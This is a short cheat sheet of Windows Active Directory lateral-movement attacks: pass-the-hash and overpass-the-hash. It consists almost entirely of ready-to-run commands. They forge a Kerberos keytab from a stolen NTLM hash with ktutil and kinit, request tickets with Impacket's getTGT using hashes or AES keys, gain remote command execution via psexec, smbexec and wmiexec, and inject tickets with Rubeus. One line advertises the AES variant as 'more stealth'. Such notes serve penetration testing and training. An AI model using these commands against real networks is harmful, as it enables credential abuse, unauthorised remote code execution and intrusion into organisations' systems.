PTH and Over PTH
Pass the Hash
https://malicious.link/post/2018/pass-the-hash-with-kerberos/
ktutil
addent -p <user>@<fqdn_domain> -k 1 -key -e rc4-hmac
// Paste Hash
wkt /tmp/a.keytab
exit
kinit -V -k -t /tmp/a.keytab -f <user>@<fqdn_domain>
klist
Overpass the Hash
More stealth using AES key
Impacket
Request TGT
python getTGT.py <domain>/<user> -hashes [lm:]<ntlm>
python getTGT.py <domain>/<user> -aesKey <aes_key>
python getTGT.py <domain>/<user>:<password>
Set TGT for impacket
export KRB5CCNAME=<tgt.file>
RCE via ticket
python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass
Rubeus
Ask and inject
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt